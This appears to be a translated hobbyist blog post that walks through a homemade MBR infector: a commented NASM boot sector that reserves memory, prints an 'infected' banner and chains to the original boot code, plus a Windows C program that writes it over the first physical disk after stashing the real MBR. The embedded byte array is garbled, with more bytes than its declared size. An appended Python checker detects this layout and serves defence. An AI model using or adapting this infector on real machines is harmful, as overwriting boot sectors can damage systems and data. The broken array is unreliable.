Weekend, sitting in the air-conditioning and hammering out code: nice. (Aside: I'll have to start saving up for a wife all over again.) t___t. There is a pile of exam material waiting to be memorized, but no motivation to memorize it.
The past two days have been all MBR. The brothers in the group said that the impressive thing about Ghost Shadow and TDL is not that they live in the MBR, but that they get through the protection of some disk-restore software; the penetration is the real highlight. I fully agree. One of the brothers in the group said he reversed the virus, converted the asm to C, recompiled it, and the anti-virus still flagged the result as a virus. That is a mysterious realm, and admiration arises of its own accord. Alas, tears, tears..
Lang Xianping once said there are three kinds of people in the world: the first kind is very clever and creates many things; the second kind reads and can understand what the first kind has done; the last kind is the dumbest and has no idea about any of it. I hope I can work towards the first kind while consolidating my standing as the second.
Not much code today, just a fake MBR and an EXE that writes it, but I still learned a lot from it. The ASM code is thoroughly commented; normally I write code for my own amusement and rarely comment it.
The EXE's main job is to copy the original MBR to the second sector and then write the knock-off MBR into the first sector; along the way it patches the knock-off MBR's partition table from the original. The code follows:
; file:    mbrforfun.asm
; author:  GaA.Ra
; e-mail:  zhoufan@yahoo.cn
; date:    2011.6.18
; compile: nasm -f bin mbrforfun.asm -o mbrforfun.img

;///////////////////////////////////////////////////////////////////////////////
CPU 486
bits 16                         ; 16-bit real mode
org 0                           ; offsets are relative to the segment we relocate into
                                ; (labels are written _name here: NASM does not accept
                                ; '@' as the first character of an identifier)

_initial:
    xor bx, bx
    mov ds, bx
    mov ax, [0x413]             ; 0x413 is the word in the BIOS data area that records
                                ; the base memory size in KB; memory is handed out
                                ; from the top down
    dec ax
    dec ax                      ; (ax - 2): reserve 2 KB
    mov [0x413], ax             ; write the reduced KB count back
                                ; the remaining KB count is also where our block
                                ; starts: ax * 1024 is the start address we reserved
    shl ax, 0x6                 ; compute the segment address: real-mode addressing is
                                ; (segment:offset) = segment * 0x10 + offset, so the
                                ; segment is (ax * 1024) / 16 = ax << 6
    mov es, ax                  ; keep it in ES
    mov si, 0x7c00              ; the BIOS loaded the MBR at 0000:7c00
    xor di, di                  ; clear DI
    mov cx, 0x100               ; length 0x100 words = 512 bytes, one sector
    rep movsw                   ; copy ourselves from ds:si (0000:7c00) to es:di,
                                ; i.e. into the reserved block

    push es                     ; ES segment onto the stack
    push word _main             ; offset of _main (16 bits)
    retf                        ; far return to es:_main, that is, continue
                                ; executing in the copy
;///////////////////////////////////////////////////////////////////////////////

;///////////////////////////////////////////////////////////////////////////////
_main:
    call _displaymessage        ; show the banner
    call _getreturn             ; wait for the user to press Enter
    call _bootos                ; hand over to the operating system's normal startup
;///////////////////////////////////////////////////////////////////////////////

;///////////////////////////////////////////////////////////////////////////////
_displaymessage:
    mov bp, titlemessage        ; ES:BP points at the string (ES is our segment)
    mov cx, titlemessage_len    ; CX holds the length of titlemessage (computed by
                                ; the assembler instead of the hard-coded 0x139)
    mov ax, 0x1301              ; AH: 0x13 is the "write string" sub-function
                                ; AL: 0x1 is the write mode (update cursor)
    mov bx, 0x000c              ; BH: 0x0 is the current page
                                ; BL: 0xc is the character attribute (red text)
    xor dx, dx                  ; DH is the row, DL is the column
    int 0x10                    ; interrupt 0x10, video services
    ret
;///////////////////////////////////////////////////////////////////////////////

;///////////////////////////////////////////////////////////////////////////////
_getreturn:
    mov ah, 0                   ; AH: 0x0 is the "read key" sub-function
    int 0x16                    ; interrupt 0x16, keyboard services;
                                ; AH returns the scan code, AL the ASCII code
    and ax, 0xff
    cmp al, 0xd                 ; was Enter pressed?
    jnz _getreturn              ; if not, keep reading
    ret
;///////////////////////////////////////////////////////////////////////////////

;///////////////////////////////////////////////////////////////////////////////
_bootos:
    mov es, dx                  ; DX is still 0 (cleared in _displaymessage and left
                                ; alone by int 0x16), so this sets ES to 0
    mov ax, 0x201               ; AH: 0x2 is the "read sectors" sub-function
                                ; AL: 0x1 means read one sector
    mov cx, 0x2                 ; CH: 0x0 is cylinder 0
                                ; CL: 0x2 is sector 2 (sectors count from 1);
                                ; the second sector holds the original MBR
    mov dx, 0x80                ; DL: 0x80 is the first hard disk (DH: head 0)
    mov bx, 0x7c00              ; es:bx (0000:7c00) is the buffer address
    int 0x13                    ; interrupt 0x13, direct disk services

    jmp 0x0000:0x7c00           ; jump back to the original MBR and boot normally
;///////////////////////////////////////////////////////////////////////////////

;///////////////////////////////////////////////////////////////////////////////
infectedflag  db "Loli"         ; the MBR's infection mark, ah hahahaha
titlemessage:
    db "+-----------------------------------------+", 0xa, 0xd
    db "|              MbrForFun.Bin              |", 0xa, 0xd
    db "|                 GaA.Ra                  |", 0xa, 0xd
    db "|            zhoufan@yahoo.cn             |", 0xa, 0xd
    db "+-----------------------------------------+", 0xa, 0xd
    db "[-] Your computer is infected by an evil Loli", 0xa, 0xd
    db "[-] Now press Enter, let's return to your OS"
titlemessage_len equ $ - titlemessage
;///////////////////////////////////////////////////////////////////////////////

;///////////////////////////////////////////////////////////////////////////////
times 510-($-$$) db 0           ; pad code and data with zeros up to 510 bytes
bootsignature dw 0xaa55         ; MBR signature, required
times 1474560-512 db 0          ; I generate a 1.44 MB image file directly, which is
                                ; convenient for debugging with Bochs; comment this
                                ; out if you do not need it
;///////////////////////////////////////////////////////////////////////////////
/*++
 @file mbrforfun.h
 @auth GaA.Ra
 @date 2011.6.18

 For Windows XP only
--*/
#ifndef _MBRFORFUN_H
#define _MBRFORFUN_H

#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <string.h>     /* memcpy() */
#include <windows.h>

#define SECTOR_SIZE    512
#define DRIVER_SYMLINK L"\\\\.\\PhysicalDrive0"

/* The first 512 bytes of mbrforfun.img (the assembled mbrforfun.asm). The partition
   table area (0x1be..0x1fd) is zero here and is patched from the real MBR at run time.
   NOTE: as this dump survived extraction, the banner rows carry duplicated bytes
   (526 values instead of 512) and no longer fit a [512] array; regenerate it from
   mbrforfun.img before building. The first six rows match mbrforfun.asm byte for byte. */
unsigned char MBR[512] = {
    0x31, 0xdb, 0x8e, 0xdb, 0xa1, 0x13, 0x04, 0x48, 0x48, 0xa3, 0x13, 0x04, 0xc1, 0xe0, 0x06, 0x8e,
    0xc0, 0xbe, 0x00, 0x7c, 0x31, 0xff, 0xb9, 0x00, 0x01, 0xf3, 0xa5, 0x06, 0x68, 0x20, 0x00, 0xcb,
    0xe8, 0x06, 0x00, 0xe8, 0x14, 0x00, 0xe8, 0x1d, 0x00, 0xbd, 0x5f, 0x00, 0xb9, 0x39, 0x01, 0xb8,
    0x01, 0x13, 0xbb, 0x0c, 0x00, 0x31, 0xd2, 0xcd, 0x10, 0xc3, 0xb4, 0x00, 0xcd, 0x16, 0x25, 0xff,
    0x00, 0x3c, 0x0d, 0x75, 0xf5, 0xc3, 0x8e, 0xc2, 0xb8, 0x01, 0x02, 0xb9, 0x02, 0x00, 0xba, 0x80,
    0x00, 0xbb, 0x00, 0x7c, 0xcd, 0x13, 0xea, 0x00, 0x7c, 0x00, 0x00, 0x4c, 0x4f, 0x4c, 0x49, 0x2b,
    0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d,
    0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d,
    0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2b, 0x0a, 0x0d, 0x7c, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x4d, 0x62, 0x72, 0x46, 0x6f,
    0x72, 0x46, 0x75, 0x6e, 0x2e, 0x42, 0x69, 0x6e, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7c, 0x0a, 0x0d, 0x7c, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x47, 0x61, 0x41, 0x2e,
    0x52, 0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x7c, 0x0a, 0x0d, 0x7c, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x7a, 0x68, 0x6f, 0x75, 0x66, 0x61, 0x6e, 0x40, 0x79, 0x61, 0x68, 0x6f,
    0x6f, 0x2e, 0x63, 0x6e, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x7c, 0x0a, 0x0d, 0x2b, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d,
    0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d,
    0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2b, 0x0a, 0x0d,
    0x5b, 0x2d, 0x5d, 0x59, 0x6f, 0x75, 0x72, 0x20, 0x43, 0x6f, 0x6d, 0x70, 0x75, 0x74, 0x65, 0x72,
    0x20, 0x69, 0x73, 0x20, 0x69, 0x6e, 0x66, 0x65, 0x63, 0x74, 0x65, 0x64, 0x20, 0x62, 0x79, 0x20,
    0x61, 0x20, 0x65, 0x76, 0x69, 0x6c, 0x20, 0x4c, 0x6f, 0x6c, 0x69, 0x0a, 0x0d, 0x5b, 0x2d, 0x5d,
    0x4e, 0x6f, 0x77, 0x20, 0x50, 0x72, 0x65, 0x73, 0x73, 0x20, 0x45, 0x6e, 0x74, 0x65, 0x72, 0x2c,
    0x20, 0x4c, 0x65, 0x74, 0x27, 0x73, 0x20, 0x72, 0x65, 0x74, 0x75, 0x72, 0x6e, 0x20, 0x74, 0x6f,
    0x20, 0x79, 0x6f, 0x75, 0x72, 0x20, 0x4f, 0x53, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xaa
};

/* Source of the array above: mbrforfun.asm (the fully commented listing is given
   above; the uncommented copy that used to be repeated here has been dropped). */

void InfectMbr(void);

#endif
/*++
 @file mbrforfun.cpp
 @auth GaA.Ra
 @date 2011.6.18

 For Windows XP only
--*/
#include "mbrforfun.h"

int main(int argc, char *argv[])
{
    printf("Are u ready!\n");
    system("pause");

    InfectMbr();

    return 0;
}

void InfectMbr(void)
{
    HANDLE hDisk;
    BYTE  *pOriMbr;
    DWORD  length;

    /* raw access to the first physical disk (needs administrator rights);
       CreateFileW is used explicitly because DRIVER_SYMLINK is a wide string */
    hDisk = CreateFileW(DRIVER_SYMLINK,
                        GENERIC_WRITE | GENERIC_READ,
                        FILE_SHARE_READ | FILE_SHARE_WRITE,
                        NULL,
                        OPEN_EXISTING,
                        0,
                        NULL);
    if (INVALID_HANDLE_VALUE == hDisk)
    {
        printf("Open Disk Error\n");
        return;
    }

    pOriMbr = (BYTE *)VirtualAlloc(NULL, SECTOR_SIZE, MEM_COMMIT, PAGE_READWRITE | PAGE_NOCACHE);
    if (NULL == pOriMbr)
    {
        printf("VirtualAlloc() error!\n");
        CloseHandle(hDisk);
        return;
    }

    /* read the original MBR from the first sector */
    SetFilePointer(hDisk, 0, NULL, FILE_BEGIN);
    if (!ReadFile(hDisk, pOriMbr, SECTOR_SIZE, &length, NULL) || length != SECTOR_SIZE)
    {
        printf("ReadFile() error!\n");
        goto cleanup;
    }

    /* write the original MBR to the second sector */
    SetFilePointer(hDisk, SECTOR_SIZE, NULL, FILE_BEGIN);
    if (!WriteFile(hDisk, pOriMbr, SECTOR_SIZE, &length, NULL))
    {
        printf("WriteFile() error!\n");
        goto cleanup;
    }

    /* fix up the partition table in our MBR: 4 entries of 16 bytes at offset 0x1be */
    memcpy(&MBR[0x1be], pOriMbr + 0x1be, 4 * 16);
    SetFilePointer(hDisk, 0, NULL, FILE_BEGIN);
    if (!WriteFile(hDisk, MBR, SECTOR_SIZE, &length, NULL))
    {
        printf("WriteFile() MBR error!\n");
        goto cleanup;
    }

cleanup:
    VirtualFree(pOriMbr, 0, MEM_RELEASE);   /* dwSize must be 0 with MEM_RELEASE */
    CloseHandle(hDisk);
}
The ASM is assembled into the MBR image; the .h and .cpp are compiled into the EXE, with the 512 bytes of the MBR pasted into the unsigned char MBR[512] array in the .h.
Effect after infection:
After you press enter, you can normally enter the operating system.
Some thoughts:
1. Free space at the front of the disk: WinHex shows about 28 KB of unused space on my VM, that is, 56 sectors. That space is usable: the code in an MBR can be at most 0x1be bytes long, and here very little of it is code, most of it is titlemessage. Using those 56 sectors well would allow much more powerful functionality (the code above already shows how to read a sector and load it into memory). In Stoned Bootkit the author uses the first 63 sectors.
2. Usable memory: under Bochs the value read from [0x413] is about 0x27f KB, which is plenty, and the copy made at startup sits at a fixed address; after the operating system is up you can still find this data in memory (marked "Loli", ah hahahaha). Two key problems remain: how do you get from 16-bit real-mode assembly into the 32-bit protected-mode address space, and how do you translate between virtual and physical addresses once the OS is in protected mode? Research continues; advice from the experts is welcome, thank you.
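From the defender's side, the layout described above (replacement boot code in sector 1, original MBR saved to sector 2, partition table copied across unchanged) is exactly what an integrity check on a raw disk image can catch, and the free sectors before the first partition that point 1 talks about are where such a check should look. The following Python checker is an added example, not part of the original post or the author's code: it verifies the 0x55AA signature, compares the boot-code region (everything before offset 0x1BE) against a known-good SHA-256 hash, extracts printable strings from the boot code for triage, and scans the gap before the first partition for a second bootable sector carrying the same partition table as sector 0. The baseline hash, the partition entries and both disk images are constructed inline so that the script runs offline; on a real system you would record the hash once from a clean MBR and feed the script a raw image of the first 63 sectors.

```python
import hashlib
import struct

SECTOR_SIZE = 512
PART_TABLE_OFF = 0x1BE        # partition table: 4 entries x 16 bytes at offset 0x1BE
BOOT_SIG_OFF = 0x1FE          # the two-byte boot signature closes the sector
BOOT_SIG = b"\x55\xaa"        # 0xAA55 little-endian, the page's 'dw 0aa55h'


def parse_partition_table(sector):
    """Decode the four partition entries of a 512-byte sector into dicts."""
    entries = []
    for i in range(4):
        off = PART_TABLE_OFF + 16 * i
        (status, _, _, _, ptype, _, _, _,
         lba_start, sectors) = struct.unpack("<BBBBBBBBII", sector[off:off + 16])
        entries.append({"status": status, "type": ptype,
                        "lba_start": lba_start, "sectors": sectors})
    return entries


def boot_code_hash(sector):
    """SHA-256 of the boot-code region (everything before the partition table)."""
    return hashlib.sha256(sector[:PART_TABLE_OFF]).hexdigest()


def ascii_strings(data, min_len=8):
    """Printable ASCII runs of at least min_len bytes, for triaging unknown boot code."""
    found, run = [], bytearray()
    for b in data:
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


def analyze_disk(image, baseline_boot_hash, max_lba=63):
    """Checks on a raw disk image: boot signature present, boot code unchanged against a
    known-good hash, and no second bootable sector carrying the same partition table in
    the gap before the first partition (a stashed copy of the original MBR)."""
    findings = []
    mbr = image[:SECTOR_SIZE]
    if mbr[BOOT_SIG_OFF:SECTOR_SIZE] != BOOT_SIG:
        findings.append("sector 0: missing 0x55AA boot signature")
    if boot_code_hash(mbr) != baseline_boot_hash:
        findings.append("sector 0: boot code differs from baseline")
    table0 = parse_partition_table(mbr)
    first_part = min((e["lba_start"] for e in table0 if e["type"] != 0), default=max_lba)
    for lba in range(1, min(first_part, max_lba)):
        sec = image[lba * SECTOR_SIZE:(lba + 1) * SECTOR_SIZE]
        if len(sec) < SECTOR_SIZE:
            break
        if sec[BOOT_SIG_OFF:] == BOOT_SIG and parse_partition_table(sec) == table0:
            findings.append(f"sector {lba}: bootable sector with the same partition table "
                            "as sector 0 (stashed original MBR?)")
    return findings


# --- constructed sample data (not taken from any real disk) -----------------------
def build_mbr(boot_code, entries):
    """Assemble a 512-byte MBR from boot code and (status, type, lba_start, sectors) entries."""
    sec = bytearray(SECTOR_SIZE)
    sec[:len(boot_code)] = boot_code
    for i, (status, ptype, lba_start, sectors) in enumerate(entries):
        off = PART_TABLE_OFF + 16 * i
        sec[off:off + 16] = struct.pack("<BBBBBBBBII", status, 0, 0, 0, ptype, 0, 0, 0,
                                        lba_start, sectors)
    sec[BOOT_SIG_OFF:] = BOOT_SIG
    return bytes(sec)


PARTITIONS = [(0x80, 0x07, 63, 1_000_000)]                            # one active partition at LBA 63
CLEAN_BOOT_CODE = b"\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 40      # stand-in for a real loader
CLEAN_MBR = build_mbr(CLEAN_BOOT_CODE, PARTITIONS)
BASELINE_HASH = boot_code_hash(CLEAN_MBR)                             # recorded from the clean system


def sample_clean_image():
    """First 63 sectors of a clean disk: the MBR followed by an empty gap."""
    return CLEAN_MBR + bytes(SECTOR_SIZE * 62)


def sample_infected_image():
    """The layout the post describes: replacement boot sector in LBA 0 that keeps the
    original partition table, original MBR saved to LBA 1, rest of the gap empty."""
    fake = build_mbr(b"\xeb\x00[-] constructed fake boot message", PARTITIONS)
    return fake + CLEAN_MBR + bytes(SECTOR_SIZE * 61)


if __name__ == "__main__":
    for name, img in (("clean", sample_clean_image()), ("infected", sample_infected_image())):
        print(name, analyze_disk(img, BASELINE_HASH) or ["no findings"])
        print("  strings:", ascii_strings(img[:SECTOR_SIZE]))
```

The partition-table comparison is the useful part: a boot-sector replacement that wants the system to keep booting has to preserve the table, so an unchanged table next to changed boot code, plus a second sector in the gap that carries the same table and a valid signature, is a stronger signal than either check on its own. The hash baseline must come from the machine's own clean MBR, since legitimate boot code differs between Windows versions and third-party boot managers.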
Finally: I love Gintama (Silver Soul)!!! I miss the silly days with my brothers!!!
Some useful information is attached:
[1] Bochs debugging commands
http://bochs.sourceforge.net/cgi-bin/topper.pl?name=new+bochs+documentation&url=http://bochs.sourceforge.net/doc/docbook/user/index.html
[2] BIOS and DOS interrupts
http://linux.chinaunix.net/techdoc/install/2008/08/26/1028043.shtml